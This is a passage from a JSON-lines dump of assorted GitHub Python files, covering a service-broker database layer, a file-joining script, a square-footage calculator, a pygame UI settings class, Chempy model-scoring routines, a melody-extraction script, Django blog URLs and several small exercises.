primary_key=True),\n Column('blueprint_id', Integer),\n Column('outputs', String),\n Column('last_operation', String))\n \n self._inputs = Table('Inputs', metadata,\n Column('id', Integer, primary_key=True),\n Column('blueprint', Integer),\n Column('name', String),\n Column('type', String),\n Column('description', String),\n Column('default', String)\n )\n \n self._tags = Table('Tags', metadata,\n Column('id', Integer, primary_key=True),\n Column('blueprint', Integer),\n Column('tag', String))\n \n self._requires = Table('Requires', metadata,\n Column('id', Integer, primary_key=True),\n Column('blueprint', Integer),\n Column('permission', String))\n \n metadata.create_all(engine)\n\n\n ######################################################################\n # Inserts a cloudify server (UNUSED)\n #\n def set_server(self, id, ip, port, tenant_name, user_name, password): \n with(self._lock):\n ins = server.insert().values(id = id, ip = ip, port = port,\n tenant_name = tenant_name,\n user_name = user_name, password = password)\n conn.execute(ins)\n\n\n ######################################################################\n # List blueprints in database\n #\n # return in catalog syntax for convenience. If canonical is true, ensure\n # proper service catalog naming [-a-zA-Z0-9]\n #\n def list_blueprints(self, canonical=False):\n with(self._lock):\n results = {}\n services = []\n rows = self._session.execute(select([self._blueprints]))\n for row in rows:\n name = row['cloudify_id'].replace('_','-') if canonical else row['cloudify_id']\n service = {'name':name,\n 'id':str(row['id']),\n 'description':row['description'],\n 'binder': row['binder']\n }\n if not service['description'] or len(service['description']) ==0:\n service['description'] = 'undescribed'\n services.append(service)\n results['services'] = services\n return results\n\n \n ######################################################################\n # Get blueprint by id\n #\n def get_blueprint_by_id(self,id):\n with(self._lock):\n row = self._session.execute(select([self._blueprints]).where(\n self._blueprints.c.id == id)).fetchone()\n return row\n \n ######################################################################\n # Get blueprint by instance/deployment id\n #\n def get_blueprint_by_deployment_id(self,instance_id):\n with(self._lock):\n row = self._session.execute(select([self._deployments]).where(\n self._deployments.c.deployment_id == instance_id)).fetchone()\n return self._session.execute(select([self._blueprints]).where(\n self._blueprints.c.id == row['blueprint_id'])).fetchone()\n \n\n ######################################################################\n # List inputs in database for a blueprint\n #\n def list_inputs(self, blueprint_id):\n with(self._lock):\n rows = self._session.execute(select([self._inputs]).where(\n self._inputs.c.blueprint == blueprint_id))\n return rows\n\n\n ######################################################################\n # Create a deployment\n #\n def create_deployment(self, deployment_id, blueprint_id):\n with(self._lock):\n ins = self._deployments.insert().values(\n blueprint_id = blueprint_id,\n deployment_id = deployment_id,\n last_operation = \"started\") \n self._session.execute(ins)\n\n\n ######################################################################\n # Update deployment status\n #\n def update_deployment_status(self, deployment_id, status):\n with(self._lock):\n upd = self._deployments.update().values(last_operation = status).where(\n self._deployments.c.deployment_id == deployment_id)\n self._session.execute(upd)\n\n ######################################################################\n # Update deployment outputs\n #\n def update_deployment_outputs(self, deployment_id, outputs):\n with(self._lock):\n upd = self._deployments.update().values(outputs = outputs).where(\n self._deployments.c.deployment_id == deployment_id)\n self._session.execute(upd)\n\n ######################################################################\n # Get deployment status\n #\n def get_deployment_status(self, deployment_id):\n with(self._lock):\n row = self._session.execute(select([self._deployments]).where(\n self._deployments.c.deployment_id == deployment_id)).fetchone()\n if not row: return None\n return row['last_operation']\n\n ######################################################################\n # Get deployment\n #\n def get_deployment(self, deployment_id):\n with(self._lock):\n row = self._session.execute(select([self._deployments]).where(\n self._deployments.c.deployment_id == deployment_id)).fetchone()\n if not row: return None\n return row\n\n ######################################################################\n # Update db with blueprint info\n #\n def update_blueprints(self, blueprints):\n with(self._lock):\n for blueprint in blueprints:\n sel = select([func.count(self._blueprints)]).\\\n where(self._blueprints.c.cloudify_id == blueprint['id'])\n #add blueprint if not already there\n if self._session.execute(sel).fetchone()[0] == 0:\n ins = self._blueprints.insert().values(\n cloudify_id=blueprint['id'],\n description=blueprint['description'])\n bpid=self._session.execute(ins).inserted_primary_key\n for key,val in blueprint['plan']['inputs'].iteritems():\n inputin = self._inputs.insert().values(\n blueprint=bpid[0],\n name=key,\n type=val['type'] if 'type' in val else None,\n description=val['description'] if 'description' in val else None,\n default=val['default'] if 'default' in val and type(val) is not dict else None)\n self._session.execute(inputin)\n\n ######################################################################\n # Check binding\n #\n def binding_exists(self, binding_id):\n with(self._lock):\n row = self._session.execute(select([self._bindings]).where(\n self._bindings.c.id == binding_id)).fetchone()\n return row != None\n\n ######################################################################\n # Add binding. Returns success boolean\n #\n def add_binding(self, binding_id, instance_id, plan_id):\n try:\n with(self._lock):\n ins = self._bindins.insert().values( \n id = binding_id,\n instance = instance_id,\n plan = plan_id)\n self._session.execute(ins)\n except:\n return False\n return True\n\n ###################################################################\n # begin/commit/rollback\n\n def commit(self): self._session.commit()\n\n def rollback(self): self._session.rollback()\n \n def close(self): return self._session.close\n\n","repo_name":"dfilppi/service-broker","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"6148650678","text":"from lib.core.data import *\n\n\ndef set_running_options(args):\n # print(args)\n # Namespace(banner=False, file=None, plugin=None, search=None, url=None)\n\n # 指定批量导入url\n if args.file:\n running_config.multiurl = True\n \n if args.search:\n search_plugin(args)\n\n\ndef search_plugin(args):\n plugins_path = '/home/zeta/Test/vulnscan/test/plugins'\n plugins = os.listdir(plugins_path)\n print(plugins)\n print(dir(plugins))\n print(plugins.index('thinkphp'))\n print(plugins.index('hahahhah'))\n\nif __name__ == '__main__':\n search_plugin('1')\n","repo_name":"feverGeek/vulnscan","sub_path":"test/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"7479377384","text":"# Let this combine files together in a directory\nimport os\nimport time\n\n# Open Large File\nresultsDir = input(\"Please Provide diretory of files (just name): \")\nresultsDir = \"./\"+resultsDir\n\nprint(resultsDir)\n\nresultsList = os.listdir(resultsDir)\nresultsList.sort()\n\n# Appends new file, should create if not exist\nbigFileName = input(\"What is new file's name (.json is assumed)? \")\nbigFileName = \"./\"+bigFileName+\".json\"\nbigFile = open(bigFileName,\"a\")\n\ntotalFiles = len(resultsList)\nfileCounter = 0\n# Loop through files\nfor eachFile in resultsList:\n currentFile = open(resultsDir+\"/\"+eachFile,\"r\")\n fileCounter += 1\n for eachLine in currentFile:\n if fileCounter < totalFiles: # If not the last file\n if eachLine[-1] != \"\\n\": # If last char is not enter\n eachLine += \"\\n\" # Add enter to line\n bigFile.write(eachLine)\n # End For eachLine\n currentFile.close()\n# End For eachFile\nbigFile.close()\n\nprint(\"Mission Complete \\n closing in 3 seconds...\")\ntime.sleep(1)\nprint(\"... 2 Seconds...\")\ntime.sleep(1)\nprint(\"... 1 Second...\")\ntime.sleep(1)\nprint(\"GoodBye\")","repo_name":"ks982579/pythonFileParse","sub_path":"glueFiles.py","file_name":"glueFiles.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"15082964118","text":"# 8 inch by 50.5\n\ndef dimensions_rectangle():\n side1 = input(\"What is the first side of the rectangle (inches(? \")\n side2 = input(\"What is the second side of the rectangle (inches)? \")\n area = side1 * side2\n floor_boards = area\n print(\"The amount of floor boards is\", floor_boards)\n \n\ndef dimensions_not_rectangle():\n sides = input(\"How many sides are there to the room?\")\n if sides == 3:\n input(\"What is the length of the first side?\")\n input(\"What is the length of the second side?\")\n input(\"What is the length of the third side?\")\n elif sides == 4:\n input(\"What is the length of the first side?\")\n input(\"What is the length of the second side?\")\n input(\"What is the length of the third side?\")\n input(\"What is the length of the fourth side?\")\n elif sides == 5:\n input(\"What is the length of the first side?\")\n input(\"What is the length of the second side?\")\n input(\"What is the length of the third side?\")\n input(\"What is the length of the fourth side?\")\n input(\"What is the length of the fifth side?\")\n\n \n\n\ndef print_dashboard():\n # Printing the user interface\n print(\"[2] Floor boards if you know dimensions if rectangle(square foot)\")\n print(\"[3] Floor boards if you know the dimensions and not rectangle\")\n print(\"\")\n print(\"[0] Exit\")\n\n # Obtaining what function the user wants to input\n user_selection = input(\"What function do you want to choose? \")\n \n\n if user_selection == \"2\":\n dimensions_rectangle()\n return True\n\n elif user_selection == \"3\":\n dimensions_not_rectangle()\n return True\n \n elif user_selection == \"0\":\n print(\"Thank you for using my program :)\")\n return False\n \n else:\n print(\"Please choose either [1], [2], [3] or [0]\")\n return True\n\n\ndef main():\n program_running = True\n\n while program_running:\n program_running = print_dashboard()\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"girlingc/Python-Practice","sub_path":"Practice/square-footage.py","file_name":"square-footage.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38299721972","text":"import pygame\n\nNAVY = pygame.Color(0, 0, 128, 255)\nLTBLUE = pygame.Color(178, 223, 238, 255)\n\n\ndef input_or_default(default, input_value=None):\n if input_value == None:\n return default\n return input_value\n\n\nclass UIContext:\n def __init__(self, title=None, width=None, height=None, display_flags=None,\n font=None, font_size=None, bg_color=None, fg_color=None,\n location=None, size=None, align=None, len_cap=None,\n line_width=None):\n # Window title\n self.title = input_or_default(\"\", title)\n\n # Screen resolution width & height\n self.width = input_or_default(640, width)\n self.height = input_or_default(480, height)\n\n # Flags to set display mode, 0 = standard windows mode with frame\n self.display_flags = input_or_default(0, display_flags)\n\n # Font type and size. TTF required for packaging as .exe\n self.font = input_or_default(\"Comfortaa-Regular.ttf\", font)\n self.font_size = input_or_default(20, font_size)\n\n # Background and foreground pygame color objects\n self.bg_color = input_or_default(LTBLUE, bg_color)\n self.fg_color = input_or_default(NAVY, fg_color)\n\n # Location and size for objects\n self.location = input_or_default((0, 0), location)\n self.size = input_or_default((100, 25), size)\n\n # Alignment for objects, -1 = left, 0 = center, 1 = right\n self.align = input_or_default(-1, align)\n assert self.align == -1 or 0 or 1, \"align must be -1, 0, or 1\"\n\n # Length cap in number of characters, 0 = no cap\n self.len_cap = input_or_default(0, len_cap)\n\n # Outline width of drawn objects\n self.line_width = input_or_default(0, line_width)\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CodeSkool/SimpleGUI2Pygame","sub_path":"Code/Shooter/utilities_1/ui/ui_context.py","file_name":"ui_context.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"8804969397","text":"def overall_Bayes():\n\t\"\"\"\n\tConvenience function to calculate the overall Bayes score, marginalizing over all parameters including beta.\n\tNB: in parameter.py, we must set the beta_parameter prior. 5+-2.5 is used here in linear space.\n\t\"\"\"\n\timport numpy as np\n\timport os\n\tfrom .parameter import ModelParameters\n\tfrom .score_function import Bayes_score\n\t\n\tdirectory = 'OverallScores/'\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\t\t\n\ta = ModelParameters()\n\tintegral,integral_err = Bayes_score()\n\t\n\tnp.savez(\"OverallScores/Bayes_score - \"+str(a.yield_table_name_sn2)+\", \"+str(a.yield_table_name_agb)+\", \"+str(a.yield_table_name_1a)+\".npz\",\n\t\t\t\tscore=integral,\n\t\t\t\tscore_err=integral_err)\n\t\n\treturn integral,integral_err\n\t\ndef overall_CV():\n\t\"\"\"\n\tConvenience function to calculate overall CV score, running MCMC over all parameters including beta.\n\tNB: must set beta_param / log10_beta priors in parameter file\n\t\"\"\"\n\timport numpy as np\n\tfrom Chempy.parameter import ModelParameters\n\timport importlib\n\timport fileinput\n\timport sys \n\timport os\n\timport multiprocessing as mp\n\timport tqdm\n\tfrom Chempy.wrapper import single_star_optimization\n\tfrom Chempy.plot_mcmc import restructure_chain\n\tfrom Chempy.cem_function import posterior_function_mcmc_quick\n\tfrom scipy.stats import norm\n\tfrom .score_function import preload_params_mcmc\n\timport matplotlib.pyplot as plt\n\t#p = mp.Pool()\n\t\n\tdirectory = 'OverallScores/'\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\t \n\t## Code to rewrite parameter file for each element in turn, so as to run MCMC for 21/22 elements only\n\t# This is definitely not a good implementation (involves rewriting entire parameter file),\n\t# But other steps are far slower\n\t\n\t# Initialise arrays\n\telement_mean = []\n\telement_sigma = []\n\toverall_score = 1.\n\tfactors = []\n\t\n\t# Starting elements (copied from original parameter file)\n\tb = ModelParameters()\n\tstarting_el = b.elements_to_trace\n\torig = \"\\telements_to_trace = \"+str(starting_el) # Original element string\n\t#print(starting_el)\n\n\t# Calculate required Chempy elements\n\tpreload = preload_params_mcmc()\n\telements_init = np.copy(preload.elements)\n\tnp.save('Scores/CV_elements.npy',elements_init)\n\t#print(elements_init) \n \n\t# Create new parameter names\n\tnewstr = []\n\tfor i,el in enumerate(elements_init):\n\t\tif el !=starting_el[-1]:\n\t\t\tnewstr.append(orig.replace(\"'\"+str(el)+\"', \",\"\"))\n\t\telse:\n\t\t\tnewstr.append(orig.replace(\"'\"+str(el)+\"'\",\"\"))\n\tfor index in range(len(elements_init)): # Iterate over removed element\n\t\tfor line in fileinput.input(\"Chempy/parameter.py\", inplace=True):\n\t\t\tif \"\\telements_to_trace\" in line:\n\t\t\t\tprint(newstr[index])\n\t\t\t\t#print(line,end='') # TO TEST\n\t\t\telse:\n\t\t\t\tprint(line,end='')\n\t\tfileinput.close()\n\t\tdel sys.modules['Chempy.parameter']\n\t\tdel sys.modules['Chempy.score_function']\n\t\tfrom Chempy.parameter import ModelParameters\n\t\tfrom .score_function import preload_params_mcmc \n\t\ta = ModelParameters()\n\t\tpreload = preload_params_mcmc()\n\t\t##############\n\t\t\n\t\t# Run MCMC with 27/28 elements. \n\t\tprint('Running MCMC iteration %d of %d' %(index+1,len(elements_init)))\n\t\t#print(a.elements_to_trace)\n\t\tsingle_star_optimization()\n\t\t\n\t\t# Create the posterior PDF and load it \n\t\trestructure_chain('mcmc/')\n\t\tpositions = np.load('mcmc/posteriorPDF.npy') # Posterior parameter PDF\n\t\t#print(\"In CV_score, element list is\",a.elements_to_trace)\n\t\t\n\t\t##############\n\t\t\n\t\tfor line in fileinput.input(\"Chempy/parameter.py\", inplace=True):\n\t\t\tif \"\\telements_to_trace\" in line:\n\t\t\t\tprint(orig)\n\t\t\telse:\n\t\t\t\tprint(line,end='')\n\t\tfileinput.close()\n\t\tdel sys.modules['Chempy.parameter']\n\t\tdel sys.modules['Chempy.score_function']\n\t\tfrom Chempy.parameter import ModelParameters\n\t\tfrom .score_function import preload_params_mcmc \n\t\ta = ModelParameters()\n\t\tpreload = preload_params_mcmc()\t\n\t\t##############\n\t\t\n\t\t# This uses all 28 elements again for predictions\n\t\t\t\t\n\t\t# Multiprocess and calculate elemental predictions for each parameter set\n\n\t\tfrom .score_function import element_predictor\n\t\tp = mp.Pool()\t\t\n\t\tindices = np.ones(len(positions))*index\n\t\tabundance = list(tqdm.tqdm(p.imap_unordered(element_predictor,zip(positions,indices)),total=len(positions)))\n\t\tp.close()\n\t\tp.join()\t\n\t\t\n\t\tabundance = np.array(abundance)\n\t\tmean,sigma = norm.fit(abundance)\n\t\tprint(mean)\n\t\tprint(sigma)\n\t\t\n\t\telement_mean.append(mean)\n\t\telement_sigma.append(sigma)\n\t\t#a.plot_hist=True\n\t\tif a.plot_hist == True:\n\t\t\tplt.clf()\n\t\t\tplt.hist(abundance, bins=40, normed=True, alpha=0.6, color='g')\n\t\t\t#abundance = np.array(abundance) # Unmask array\n\t\t\t# Plot the PDF.\n\t\t\txmin, xmax = plt.xlim()\n\t\t\tx = np.linspace(xmin, xmax, 100)\n\t\t\tp = norm.pdf(x, mean, sigma)\n\t\t\tplt.plot(x, p, c='k', linewidth=2)\n\t\t\ttitle = 'Plot of element %d abundance' %(index)\n\t\t\tplt.title(title)\n\t\t\tplt.xlabel('[X/Fe] abundance')\n\t\t\tplt.ylabel('Relative frequency')\n\t\t\n\t\ttotal_err = np.sqrt((preload.star_error_list[index])**2 + sigma**2)\n\t\tlikelihood_factor = norm.pdf(mean,loc=preload.star_abundance_list[index],scale=total_err)\n\t\toverall_score *= likelihood_factor\n\t\tfactors.append(likelihood_factor)\n\t\tprint(\"Likelihood contribution from %dth element is %.8f\" %(index+1,likelihood_factor))\n\t\tprint(overall_score)\n\t\tsys.stdout.flush()\n\t\t#print(starting_el)\n\tnp.savez('OverallScores/CV_element_likelihoods.npz',\n\t\t\t\telements=elements_init,\n\t\t\t\tlikelihood_factors=factors,\n\t\t\t\telement_mean = element_mean,\n\t\t\t\telement_sigma = element_sigma)\t\n\t\n\trescaled_score = np.power(overall_score,1./len(starting_el))\n\t\t\t\n\tnp.save(\"OverallScores/CV_score_rescaled - \"+str(a.yield_table_name_sn2)+\\\n\t\",\"+str(a.yield_table_name_agb)+\", \"+str(a.yield_table_name_1a)+\".npy\",rescaled_score)\n\t\t\t\t\n\treturn rescaled_score\n\t\ndef CV_errors():\n\t\"\"\"\n\tThis function computes the overall CV score with errors.\n\tMedian and errors (16/84 percentile) are estimated by running the process 10 times.\n\t\"\"\"\n\tfrom .overall_scores import overall_CV\t\n\timport numpy as np\n\tfrom .parameter import ModelParameters\n\ta = ModelParameters()\n\t\n\tscores = []\n\tfor _ in range(10):\n\t\ttmp = overall_CV()\n\t\tscores.append(np.log10(tmp))\n\t\t\t\n\tmedian = np.median(scores)\n\tlower = np.percentile(scores,15.865)\n\tupper = np.percentile(scores,100-15.865)\n\t\n\tprint(\"Average LOO-CV score over 10 iterations is %.2f + %.2f - %.2f\" %(median,median-lower,upper-median))\n\tnp.savez(\"OverallScores/ErrorCV - \"+str(a.yield_table_name_sn2)+\", \"+str(a.yield_table_name_agb)+\", \"+str(a.yield_table_name_1a)+\".npz\",\n\t\t\t\tmedian=median,lower=lower,upper=upper)\n\treturn median, median-lower,upper-median\n\t\ndef CV_element_predictions(size=10):\n\t\"\"\"\n\tThis function computes the NORMALISED element predictions from the CV scoring.\n\tPredictions and sigmas are estimated 10 times over to check for scatter.\n\t\"\"\"\n\tfrom .overall_scores import overall_CV\t\n\timport numpy as np\n\tfrom .parameter import ModelParameters\n\ta = ModelParameters()\n\t\n\tscores = []\n\tel_means=[]\n\tel_sigmas=[]\n\tel_likelihoods=[]\n\tfor i in range(size):\n\t\tprint('Computing score %d of %s' %(i+1,size))\n\t\ttmp = overall_CV()\n\t\tscores.append(np.log10(tmp))\n\t\tel_dat = np.load('OverallScores/CV_element_likelihoods.npz')\n\t\tel_means.append(el_dat['element_mean'])\n\t\tel_sigmas.append(el_dat['element_sigma'])\n\t\tel_likelihoods.append(el_dat['likelihood_factors'])\n\t\tel_dat.close()\n\t\n\tel_dat = np.load('OverallScores/CV_element_likelihoods.npz')\n\tel_names = el_dat['elements']\n\tel_dat.close()\n\t\n\t# Save output as npz file - each will be list of identically simulated data\n\tnp.savez('OverallScores/CV_normalised_element_predictions_'+str(a.yield_table_name_sn2)+'.npz',\n\t\t\t\tmean=el_means,sigma=el_sigmas,elements=el_names,likelihood=el_likelihoods,normalised_scores=scores)\n\t\n\treturn None","repo_name":"henryyuanheng-wang/GibbsChem","sub_path":"Chempy/overall_scores.py","file_name":"overall_scores.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1941523092","text":"import logging\nfrom typing import List\n\nfrom clt_observer import ObservedAlignedSeq\nfrom barcode_metadata import BarcodeMetadata\n\ndef binarize_observations(bcode_meta: BarcodeMetadata, observations: List[ObservedAlignedSeq]):\n \"\"\"\n Prepares the observations to be sent to phylip\n Each event is represented by a tuple (start idx, end idx, insertion)\n\n @return processed_seqs: Dict[str, List[float, List[List[Event]]]]\n this maps the sequence names to (abundance, list of event lists)\n all_event_dict: List[Dict[event_tuple, event number]]\n maps events to their event number\n event_list: List[event_tuple]\n the reverse of all_event_dict\n \"\"\"\n # Figure out what events happened\n processed_seqs = {}\n all_events = [set() for _ in range(bcode_meta.num_barcodes)]\n for idx, obs in enumerate(observations):\n evts_list = []\n for bcode_idx, allele_evts in enumerate(obs.allele_events_list):\n evts = allele_evts.events\n evts_bcode = [evt for evt in evts]\n all_events[bcode_idx].update(evts_bcode)\n evts_list.append(evts_bcode)\n processed_seqs[\"seq{}\".format(idx)] = [obs.abundance, evts_list, obs.cell_state]\n logging.info(\"seq%d %s\", idx, str(obs))\n\n # Assemble events in a dictionary\n event_dicts = []\n event_list = []\n num_evts = 0\n for bcode_idx, bcode_evts in enumerate(all_events):\n bcode_evt_list = list(bcode_evts)\n event_list += [(bcode_idx, evt) for evt in bcode_evt_list]\n event_bcode_dict = {evt: num_evts + i for i, evt in enumerate(bcode_evt_list)}\n num_evts += len(event_bcode_dict)\n event_dicts.append(event_bcode_dict)\n\n return processed_seqs, event_dicts, event_list\n","repo_name":"matsengrp/gapml","sub_path":"gestalt/data_binarizer.py","file_name":"data_binarizer.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"37314108657","text":"from property import Property\n\nclass Apartment(Property):\n valid_laundries = (\"coin\", \"ensuits\", \"none\")\n valid_balconies = (\"yes\", \"no\", \"solarium\")\n\n def __init__(self, balcony='', laundry='', **kwargs):\n super().__init__(**kwargs) # imp initializing property constructor with dictionary created by prompt init\n self.balcony = balcony\n self.laundry = laundry\n\n def display(self):\n super().display()\n print(\"Apartment Information\")\n print(\"**********************\")\n print(f\"Laundry: {self.laundry}\")\n print(f\"Has Balcony: {self.balcony}\")\n\n @staticmethod\n def prompt_init():\n parent_init = Property.prompt_init()\n laundry = get_valid_input(\"What laundry facilities does\"\n f\"the property have?:\",\n Apartment.valid_laundries)\n balcony = get_valid_input(\"Does the property have a balcony?\",\n Apartment.valid_balconies)\n parent_init.update({'laundry': laundry, 'balcony': balcony})\n return parent_init\n\ndef get_valid_input(input_string, valid_options):\n input_string += \"({})\".format(','.join(valid_options))\n response = input(input_string)\n while response.lower() not in valid_options:\n response = input(input_string)\n return response\n\nif __name__ == '__main__':\n init = Apartment.prompt_init()\n apartment = Apartment(**init)\n apartment.display()","repo_name":"Lalit-Singh21/Python-programs-","sub_path":"real_estate/property/apartment.py","file_name":"apartment.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22548666208","text":"class Solution(object):\n def knightProbability(self, N, K, r, c):\n \"\"\"\n :type N: int\n :type K: int\n :type r: int\n :type c: int\n :rtype: float\n \"\"\"\n cache = {}\n\n n_moves = pow(8, K)\n\n def rec_move(N, K, r, c):\n\n key = (K, r, c)\n\n if key in cache:\n return cache[key]\n\n out = 0\n\n if 0 <= r < N and 0 <= c < N:\n\n if K > 0:\n\n out1 = rec_move(N, K - 1, r + 2, c + 1)\n out2 = rec_move(N, K - 1, r + 2, c - 1)\n out3 = rec_move(N, K - 1, r - 2, c + 1)\n out4 = rec_move(N, K - 1, r - 2, c - 1)\n out5 = rec_move(N, K - 1, r - 1, c - 2)\n out6 = rec_move(N, K - 1, r + 1, c - 2)\n out7 = rec_move(N, K - 1, r - 1, c + 2)\n out8 = rec_move(N, K - 1, r + 1, c + 2)\n\n out = out1 + out2 + out3 + out4 + out5 + out6 + out7 + out8\n\n cache[key] = out\n else:\n return 1\n\n return out\n\n out = rec_move(N, K, r, c)\n\n return out / n_moves\n\n\n# N - chessboard dim\n# K - moves\n# r-th row knight starts at\n# c-th column knight starts at\nprint(\"Probability that the knight remains on the board after it has stopped moving:\",\n Solution().knightProbability(N=3, K=2, r=0, c=0))\n\nprint(\"Probability that the knight remains on the board after it has stopped moving:\",\n Solution().knightProbability(N=3, K=1, r=0, c=0))","repo_name":"Jachu05/leetcode","sub_path":"688/1_1_1.py","file_name":"1_1_1.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1022995690","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 12 09:51:20 2016\nDescription: Melody (sequence of F0 values) extraction from vocal polyphonic music signals.\nDependencies: Esentia - audio feature extraction tool box (http://essentia.upf.edu/)\n SMS tools - (Installation is not required) Spectral modeling and sysnthsis tool box (https://github.com/MTG/sms-tools). Some of the functions are used with acknowledgement. No need to install explicitely \n Numpy - numerical python package\n Scipy - scientific python package\n Matplotlib- python plotting package\nInputs: Music excrept smapled at 44.1KHz and the time frequency pairs of melody obtained from Melodia plug-in for comparision.\nOutputs: Melody of the vocals\n@author: Gurunath Reddy M\n\n\"\"\"\n#==============================================================================\n# import waveio as io\n# import dftStft as stft\n# from scipy.signal import get_window\n# import plotSpect as pltspct\n# import onsetSpectDiff as onspdiff\n# import essentiaSpecGram as essSpec\n#==============================================================================\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom essentia import *\nfrom essentia.standard import *\n\ninputFile = '../segwav/3.wav'\nmelodiaF0File = '../segwav/3.txt' # Melody contour obtained from the Melodia. Please comment if you don't have melody extracted from Melodia (http://mtg.upf.edu/technologies/melodia)\n \nfs = 44100.0\naudio = MonoLoader(filename = inputFile)() # Load audio file\naudio = EqualLoudness()(audio) # Passing music signal through an equal loudness filter to emphasise vocal regions\n#x = np.copy(audio) # Make a copy of signal smaples to convert data type\n#x = np.array(x, np.float64) # Convert the samples to matlab double data type\n#x = x/(1.01*np.max(np.abs(x))); # Normalize sample values\n#x = x - np.mean(x) # Perform mean subtraction to remove DC bias \n#lenX = x.size # Length of the signal in samples\n#timeAxis = np.arange(lenX)/float(fs) # Music signal time axis\nwindow = 'hamming'\n\n# Percussion suppression of the vocal polyphonic music signal\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n#==============================================================================\n# import percussionSuppress as percSupp\n# audio = percSupp.percusionSeparation(audio, fs, window, M=2048, H=512, N=4096, inputFile='harmonic')\n# audio = essentia.array(y)\n#==============================================================================\n\n# Vocal and Non-Vocal detecton\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nhopSize = 256\nframeSize = 2048\nimport saliencyBasedVUV as vnv\nspecGram, vocalBeg, vocalEnd, totalSalienceEnrg = vnv.musicVocaliNonVocalic(audio, hopSize, frameSize, fs)\n\n# Converting vocal beg and end index values to time\nvocalBeg = (vocalBeg * fs) / hopSize # Vocal begin in frame number\nvocalEnd = (vocalEnd * fs) / hopSize # Vocal end in frame number \n\n# Melody contour detection\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nM = 2756 # 1024\nN = 4096 # 2048 \nH = 256 # Corrresponds to 5ms of hop size \nimport dominantHarmonicSeries_V6 as domintharmic\nmedFiltResonF0 = domintharmic.resonanceFreqExtract(audio, fs, M, N, H)\ntimeMedFiltRes = (np.arange(np.size(medFiltResonF0)) * H) /float(fs)\n\nplt.figure() \nplt.plot(timeMedFiltRes, medFiltResonF0, 'g')\nmelodiaF0 = np.loadtxt(melodiaF0File)\nplt.plot(melodiaF0[:, 0], melodiaF0[:, 1], 'r') # Shift the melody obtained by Melodia plugin-up by 50Hz for visualization\nplt.ylim([0, 500])\nplt.xlim([0, np.max(timeMedFiltRes)])\nplt.title('Melody without Vocal and Non-Vocal Detection (P = proposed, M = Melodia) ')\nplt.xlabel('Time(s)')\nplt.ylabel('Frequency(Hz)')\nplt.legend(['P', 'M'])\n\nvocalMelody = np.zeros(np.size(medFiltResonF0))\nfor i in range(np.size(vocalBeg)):\n begFrame = np.int(vocalBeg[i])\n endFrame = np.int(vocalEnd[i])\n vocalMelody[begFrame:endFrame] = medFiltResonF0[begFrame:endFrame]\n\nplt.figure() \nplt.plot(timeMedFiltRes, vocalMelody, 'g')\n#melodiaF0 = np.loadtxt(melodiaF0File)\nplt.plot(melodiaF0[:, 0], melodiaF0[:, 1], 'r') # Shift the melody obtained by Melodia plugin-up by 50Hz for visualization\nplt.ylim([0, 500])\nplt.xlim([0, np.max(timeMedFiltRes)])\nplt.title('Melody with Vocal and Non-Vocal Detection (P = proposed, M = Melodia) ')\nplt.xlabel('Time(s)')\nplt.ylabel('Frequency(Hz)')\nplt.legend(['P', 'M'])\n","repo_name":"mgurunathreddy/Melody-Extraction","sub_path":"Saliency_Based_Melody_Extraction/mainDominHarmSeries_V1.py","file_name":"mainDominHarmSeries_V1.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"30791878071","text":"from django.urls import re_path\nfrom blog.views import RSSFeed\nfrom . import views\n\n\napp_name = 'blog'\nurlpatterns = [\n re_path(r'^$', views.index, name='index'),\n re_path(r'^page/(?P[0-9]+)/$', views.get_page, name='page'),\n re_path(r'^post/(?P[0-9]+)/$', views.detail, name='detail'),\n re_path(r'^archives/(?P[0-9]{4})/(?P[0-9]{1,2})/$', views.archives, name='archives'),\n re_path(r'^category/(?P[0-9]+)/$', views.category, name='category'),\n re_path(r'^tag/(?P[0-9]+)/$', views.tag, name='tag'),\n re_path(r'^rss/$', RSSFeed, name=\"RSS\"),\n\n]","repo_name":"786440445/blogproject","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27752560059","text":"import os\nimport json\nimport time\n\nfrom flask import Flask, request, jsonify, g\nimport redis\nfrom pymongo import MongoClient\nimport jwt\n\nfrom utils import random_with_N_digits\n\n\napp = Flask('todos-api')\n\nredis_host = os.getenv('REDIS_HOST')\nredis_port = 